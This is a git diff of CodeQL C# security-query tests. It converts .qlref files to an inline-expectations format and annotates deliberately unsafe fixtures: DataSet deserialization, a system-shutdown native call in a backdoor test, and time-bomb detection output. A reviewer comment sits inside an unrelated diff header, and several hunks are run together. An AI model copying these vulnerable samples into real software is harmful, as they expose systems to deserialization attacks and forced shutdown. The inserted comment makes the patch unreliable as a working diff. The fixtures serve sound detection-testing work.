diff --git a/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref b/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref
index 1593497c7932..62c0d0c79d22 100644
--- a/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref
+++ b/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref
@@ -1 +1,2 @@
-experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql
\ No newline at end of file
+query: experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref b/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref index 8054e46f929b..1d26399183e2 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref +++ b/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref @@ -1 +1,2 @@ -experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql \ No newline at end of file +query: experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/test0.cs b/csharp/ql/test/experimental/Security Features/Serialization/test0.cs index d2b2e772245a..a9efeb04ffe9 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/test0.cs +++ b/csharp/ql/test/experimental/Security Features/Serialization/test0.cs @@ -8,9 +8,9 @@ namespace DataSetSerializationTest { - public class DerivesFromDeprecatedType1 : XmlSerializer // warning:DefiningDatasetRelatedType.ql + public class DerivesFromDeprecatedType1 : XmlSerializer // warning:DefiningDatasetRelatedType.ql // $ Alert[cs/dataset-serialization/defining-dataset-related-type] { - public DataSet MyDataSet { get; set; } // bug:DefiningPotentiallyUnsafeXmlSerializer.ql + public DataSet MyDataSet { get; set; } // bug:DefiningPotentiallyUnsafeXmlSerializer.ql // $ Alert[cs/dataset-serialization/defining-potentially-unsafe-xml-serializer] public DerivesFromDeprecatedType1() { 
@@ -54,9 +54,9 @@ public override void WriteEndObject(XmlDictionaryWriter writer) { } */ [Serializable()] - public class AttributeSerializer01 // warning:DefiningDatasetRelatedType.ql + public class AttributeSerializer01 // warning:DefiningDatasetRelatedType.ql // $ Alert[cs/dataset-serialization/defining-dataset-related-type] { - private DataSet MyDataSet; // bug:DefiningPotentiallyUnsafeXmlSerializer.ql + private DataSet MyDataSet; // bug:DefiningPotentiallyUnsafeXmlSerializer.ql // $ Alert[cs/dataset-serialization/defining-potentially-unsafe-xml-serializer] AttributeSerializer01() { @@ -83,15 +83,15 @@ static void datatable_readxmlschema_01(string fileName) { DataTable newTable = new DataTable(); System.Xml.XmlTextReader reader = new System.Xml.XmlTextReader(fs); - newTable.ReadXmlSchema(reader); //bug:XmlDeserializationWithDataSet.ql + newTable.ReadXmlSchema(reader); //bug:XmlDeserializationWithDataSet.ql // $ Alert[cs/dataset-serialization/xml-deserialization-with-dataset] } } static void Main(string[] args) { - XmlSerializer x = new XmlSerializer(typeof(DataSet)); // bug:UnsafeTypeUsedDataContractSerializer.ql - XmlSerializer y = new XmlSerializer(typeof(AttributeSerializer01)); //bug:UnsafeTypeUsedDataContractSerializer.ql + XmlSerializer x = new XmlSerializer(typeof(DataSet)); // bug:UnsafeTypeUsedDataContractSerializer.ql // $ Alert[cs/dataset-serialization/unsafe-type-used-data-contract-serializer] + XmlSerializer y = new XmlSerializer(typeof(AttributeSerializer01)); //bug:UnsafeTypeUsedDataContractSerializer.ql // $ Alert[cs/dataset-serialization/unsafe-type-used-data-contract-serializer] Console.WriteLine("Hello World!"); } diff --git a/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref b/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref index 1215c001b40c..4a8dc07046fe 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref 
+++ b/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql \ No newline at end of file +query: experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected index 95a491293ddb..e5773327060f 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected @@ -1,12 +1,3 @@ -nodes -| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | -| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | -| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | -| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | -| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | -| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | -| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | -subpaths edges | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | test.cs:71:36:71:48 | access to local variable lastWriteTime | provenance | | | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | provenance | | 
@@ -17,7 +8,16 @@ edges | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo : Int32 | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:36:71:70 | call to method AddHours | provenance | | +nodes +| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | +| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | +| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | +| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | +| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | +| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | +| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | problems | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo : Int32 | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. 
| test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:76 | ... >= ... | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | +subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref index f76817aa089e..c2b5b618cec9 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/PotentialTimeBomb.ql \ No newline at end of file +query: experimental/Security Features/backdoor/PotentialTimeBomb.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected index b8074b4fa636..010a2877589c 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected @@ -1,4 +1,4 @@ edges nodes -subpaths problems +subpaths 
diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref index d1d0d520d61e..767d3e6961af 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql \ No newline at end of file +query: experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/test.cs b/csharp/ql/test/experimental/Security Features/backdoor/test.cs index 1aecc80aa83f..c622eda8044e 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/test.cs +++ b/csharp/ql/test/experimental/Security Features/backdoor/test.cs @@ -29,7 +29,7 @@ class External void TestDangerousNativeFunctionCall() { - InitiateSystemShutdownExW(null, null, 0U, true, true, 2147745794U); // BUG : DangerousNativeFunctionCall + InitiateSystemShutdownExW(null, null, 0U, true, true, 2147745794U); // BUG : DangerousNativeFunctionCall // $ Alert[cs/backdoor/dangerous-native-functions] } ulong GetFvnHash(string s) diff --git a/csharp/ql/test/library-tests/arguments/PrintAst.qlref b/csharp/ql/test/library-tests/arguments/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/arguments/PrintAst.qlref +++ b/csharp/ql/test/library-tests/arguments/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/assignments/PrintAst.qlref b/csharp/ql/test/library-tests/assignments/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/assignments/PrintAst.qlref 
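Review bot: This is the only expectation added to backdoor/test.cs, yet PotentialTimeBomb.qlref in the same directory also gains `postprocess: utils/test/InlineExpectationsTestQuery.ql`, and PotentialTimeBomb.expected still lists three results on the `if` at test.cs:71:9:74:9. Unless that statement already carries an expectation outside this hunk, those results would presumably be reported as unexpected. I would expect a matching `// $ Alert[<PotentialTimeBomb query id>]` on it (the id is not shown in this patch), or the postprocess line left out of that `.qlref` until the annotation exists. The enclosing class body lies outside the hunk.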
+++ b/csharp/ql/test/library-tests/assignments/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/attributes/PrintAst.qlref b/csharp/ql/test/library-tests/attributes/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/attributes/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/attributes/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/comments/PrintAst.qlref b/csharp/ql/test/library-tests/comments/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/comments/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/comments/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/compilations/CompilerError.qlref b/csharp/ql/test/library-tests/compilations/CompilerError.qlref
index a0132abfe57b..4bceeaba10c1 100644
--- a/csharp/ql/test/library-tests/compilations/CompilerError.qlref
+++ b/csharp/ql/test/library-tests/compilations/CompilerError.qlref
@@ -1 +1 @@
-Diagnostics/CompilerError.ql
\ No newline at end of file
+query: Diagnostics/CompilerError.ql
diff --git a/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref b/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref
index 0628dcba52e5..c4a8ee06a014 100644
--- a/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref
+++ b/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref
@@ -1 +1 @@
-Diagnostics/CompilerMessage.ql
\ No newline at end of file
+query: Diagnostics/CompilerMessage.ql
diff --git a/csharp/ql/test/library-tests/compilations/ExtractorError.qlref b/csharp/ql/test/library-tests/compilations/ExtractorError.qlref
index 14290bb4ace5..d343d7778b82 100644
--- a/csharp/ql/test/library-tests/compilations/ExtractorError.qlref
+++ b/csharp/ql/test/library-tests/compilations/ExtractorError.qlref
@@ -1 +1 @@
-Diagnostics/ExtractorError.ql
+query: Diagnostics/ExtractorError.ql
diff --git a/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref b/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref
index ce6ac3bff0ab..cedb003d69c3 100644
--- a/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref
+++ b/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref
@@ -1 +1 @@
-Diagnostics/ExtractorMessage.ql
\ No newline at end of file
+query: Diagnostics/ExtractorMessage.ql
diff --git a/csharp/ql/test/library-tests/constructors/PrintAst.qlref b/csharp/ql/test/library-tests/constructors/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/constructors/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/constructors/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref b/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp11/PrintAst.qlref b/csharp/ql/test/library-tests/csharp11/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp11/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp11/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp6/PrintAst.qlref b/csharp/ql/test/library-tests/csharp6/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp6/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp6/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp7/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp7/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp7/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp8/PrintAst.qlref b/csharp/ql/test/library-tests/csharp8/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp8/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp8/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/csharp9/PrintAst.qlref b/csharp/ql/test/library-tests/csharp9/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/csharp9/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/csharp9/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref b/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref b/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/definitions/PrintAst.qlref b/csharp/ql/test/library-tests/definitions/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/definitions/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/definitions/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/definitions/definitions.qlref b/csharp/ql/test/library-tests/definitions/definitions.qlref
index 11e03f5ab070..89fab02d1037 100644
--- a/csharp/ql/test/library-tests/definitions/definitions.qlref
+++ b/csharp/ql/test/library-tests/definitions/definitions.qlref
@@ -1 +1 @@
-definitions.ql
\ No newline at end of file
+query: definitions.ql
diff --git a/csharp/ql/test/library-tests/delegates/PrintAst.qlref b/csharp/ql/test/library-tests/delegates/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/delegates/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/delegates/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref b/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref
index 7068705cc1be..498f8bf078e9 100644
--- a/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref
+++ b/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref
@@ -1 +1 @@
-Diagnostics/DiagnosticExtractionErrors.ql
+query: Diagnostics/DiagnosticExtractionErrors.ql
diff --git a/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref b/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref
index e900e9c5314b..58bc903a431d 100644
--- a/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref
+++ b/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-Diagnostics/ExtractedFiles.ql
+query: Diagnostics/ExtractedFiles.ql
diff --git a/csharp/ql/test/library-tests/dynamic/PrintAst.qlref b/csharp/ql/test/library-tests/dynamic/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/dynamic/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/dynamic/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/enums/PrintAst.qlref b/csharp/ql/test/library-tests/enums/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/enums/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/enums/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/events/PrintAst.qlref b/csharp/ql/test/library-tests/events/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/events/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/events/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/exceptions/PrintAst.qlref b/csharp/ql/test/library-tests/exceptions/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/exceptions/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/exceptions/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/expressions/PrintAst.qlref b/csharp/ql/test/library-tests/expressions/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/expressions/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/expressions/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/extension/PrintAst.qlref b/csharp/ql/test/library-tests/extension/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/extension/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/extension/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/fields/PrintAst.qlref b/csharp/ql/test/library-tests/fields/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/fields/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/fields/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref b/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref
index 638bf4567627..612f5dfb3322 100644
--- a/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref
+++ b/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref
@@ -1 +1 @@
-filters/ClassifyFiles.ql
\ No newline at end of file
+query: filters/ClassifyFiles.ql
diff --git a/csharp/ql/test/library-tests/generics/PrintAst.qlref b/csharp/ql/test/library-tests/generics/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/generics/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/generics/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/goto/PrintAst.qlref b/csharp/ql/test/library-tests/goto/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/goto/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/goto/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/indexers/PrintAst.qlref b/csharp/ql/test/library-tests/indexers/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/indexers/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/indexers/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/initializers/PrintAst.qlref b/csharp/ql/test/library-tests/initializers/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/initializers/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/initializers/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/linq/PrintAst.qlref b/csharp/ql/test/library-tests/linq/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/linq/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/linq/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/members/PrintAst.qlref b/csharp/ql/test/library-tests/members/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/members/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/members/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/methods/PrintAst.qlref b/csharp/ql/test/library-tests/methods/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/methods/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/methods/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/nameof/PrintAst.qlref b/csharp/ql/test/library-tests/nameof/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/nameof/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/nameof/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/namespaces/PrintAst.qlref b/csharp/ql/test/library-tests/namespaces/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/namespaces/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/namespaces/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref b/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/operators/PrintAst.qlref b/csharp/ql/test/library-tests/operators/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/operators/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/operators/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/partial/PrintAst.qlref b/csharp/ql/test/library-tests/partial/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/partial/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/partial/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/properties/PrintAst.qlref b/csharp/ql/test/library-tests/properties/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/properties/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/properties/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
